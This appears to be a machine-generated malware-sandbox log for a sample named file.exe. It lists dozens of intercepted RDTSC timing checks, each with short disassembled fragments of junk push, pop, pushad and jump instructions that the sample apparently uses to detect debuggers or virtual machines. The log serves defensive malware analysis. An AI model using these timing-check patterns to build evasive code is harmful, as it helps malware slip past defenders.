Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17C3805 second address: 17C3809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FBFF4 second address: 17FBFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FBFF8 second address: 17FBFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FBFFE second address: 17FC018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3650C99DA4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC179 second address: 17FC17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC703 second address: 17FC731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3650C99D96h 0x0000000a popad 0x0000000b jmp 00007F3650C99DA9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jc 00007F3650C99D96h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC731 second address: 17FC75A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F3650BE6D76h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jo 00007F3650BE6D78h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push edx 0x00000021 jno 00007F3650BE6D76h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC75A second address: 17FC763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC763 second address: 17FC767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC8D6 second address: 17FC8FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3650C99D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3650C99DA4h 0x00000011 je 00007F3650C99D96h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC8FC second address: 17FC906 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3650BE6D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FC906 second address: 17FC910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FFD29 second address: 17FFD4E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3650BE6D82h 0x00000008 jg 00007F3650BE6D76h 0x0000000e je 00007F3650BE6D76h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3650BE6D7Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1805930 second address: 1805936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1804658 second address: 180466A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3650BE6D7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180466A second address: 18046A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F3650C99D9Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F3650C99DB0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18046A0 second address: 18046BC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3650BE6D87h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1804CC1 second address: 1804CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1804CC7 second address: 1804CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1805000 second address: 1805004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180513E second address: 1805143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1805143 second address: 1805164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3650C99DA4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1805311 second address: 1805322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F3650BE6D76h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1805322 second address: 1805369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650C99DA1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F3650C99DA9h 0x00000014 jmp 00007F3650C99DA2h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180B624 second address: 180B644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F3650BE6D8Bh 0x0000000b jmp 00007F3650BE6D85h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180A0AF second address: 180A0B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180A0B3 second address: 180A0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180ABE0 second address: 180ABE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180ABE6 second address: 180ABEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180ABEC second address: 180AC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3650C99DA6h 0x0000000d jns 00007F3650C99D96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180B4EE second address: 180B4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180B4F2 second address: 180B4F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180B4F8 second address: 180B4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181234A second address: 1812352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18169D4 second address: 18169F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3650BE6D76h 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F3650BE6D7Eh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18163BB second address: 18163EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jng 00007F3650C99D96h 0x0000000d jmp 00007F3650C99DA4h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007F3650C99D96h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18163EB second address: 18163F9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F3650BE6D76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18163F9 second address: 1816427 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA7h 0x00000007 jmp 00007F3650C99DA3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1816688 second address: 181668C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181668C second address: 181669E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3650C99D9Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181669E second address: 18166DA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3650BE6D7Eh 0x00000008 jne 00007F3650BE6D7Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 jp 00007F3650BE6D76h 0x0000001b pop edi 0x0000001c jo 00007F3650BE6D80h 0x00000022 jmp 00007F3650BE6D7Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18166DA second address: 181670A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3650C99D9Eh 0x00000008 jmp 00007F3650C99D9Ah 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F3650C99D9Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181D37C second address: 181D392 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3650BE6D7Ch 0x00000008 jnc 00007F3650BE6D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181D392 second address: 181D39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181D39E second address: 181D3A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181C264 second address: 181C277 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3650C99D96h 0x00000008 jne 00007F3650C99D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181C60E second address: 181C612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181C755 second address: 181C767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 181D06A second address: 181D082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D83h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821400 second address: 1821420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F3650C99D96h 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jo 00007F3650C99DAAh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821420 second address: 1821426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821426 second address: 182142A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18216F4 second address: 18216F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821B16 second address: 1821B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821B1C second address: 1821B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821B26 second address: 1821B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821B2C second address: 1821B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821C72 second address: 1821C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007F3650C99D96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1821C7E second address: 1821C8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3650BE6D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1824B03 second address: 1824B13 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3650C99DA2h 0x00000008 jg 00007F3650C99D96h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182B411 second address: 182B43B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F3650BE6D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3650BE6D89h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182B5C3 second address: 182B5E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Fh 0x00000007 jnc 00007F3650C99D96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182B5E0 second address: 182B5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182B5F5 second address: 182B604 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3650C99D96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182B9EE second address: 182B9FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3650BE6D76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182BF78 second address: 182BF7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C226 second address: 182C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jno 00007F3650BE6D76h 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C235 second address: 182C255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99DA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F3650C99D96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C55A second address: 182C55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C55E second address: 182C57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3650C99DA4h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C57C second address: 182C586 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3650BE6D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C805 second address: 182C81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F3650C99D9Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C81E second address: 182C823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182C823 second address: 182C82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3650C99D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182D090 second address: 182D094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 182D094 second address: 182D0B9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3650C99D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F3650C99DAFh 0x00000010 jmp 00007F3650C99DA3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830895 second address: 183089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183089B second address: 18308A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308A1 second address: 18308AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308AB second address: 18308B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308B1 second address: 18308B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308B6 second address: 18308BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308BC second address: 18308C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 18308C0 second address: 18308D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830D07 second address: 1830D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1830EAA second address: 1830EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CFB8 second address: 183CFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650BE6D84h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CFD1 second address: 183CFD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183CFD7 second address: 183CFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D6F1 second address: 183D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D81B second address: 183D823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D823 second address: 183D840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3650C99DA8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D840 second address: 183D845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D845 second address: 183D85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3650C99D96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F3650C99D96h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183D85A second address: 183D85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183DCCB second address: 183DCE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3650C99D9Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3650C99DA2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183DCE4 second address: 183DD0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3650BE6D76h 0x0000000a jp 00007F3650BE6D82h 0x00000010 jne 00007F3650BE6D76h 0x00000016 jnc 00007F3650BE6D76h 0x0000001c push eax 0x0000001d push edx 0x0000001e jne 00007F3650BE6D76h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183DD0A second address: 183DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183DD0E second address: 183DD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E440 second address: 183E446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E446 second address: 183E44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 183E44B second address: 183E451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
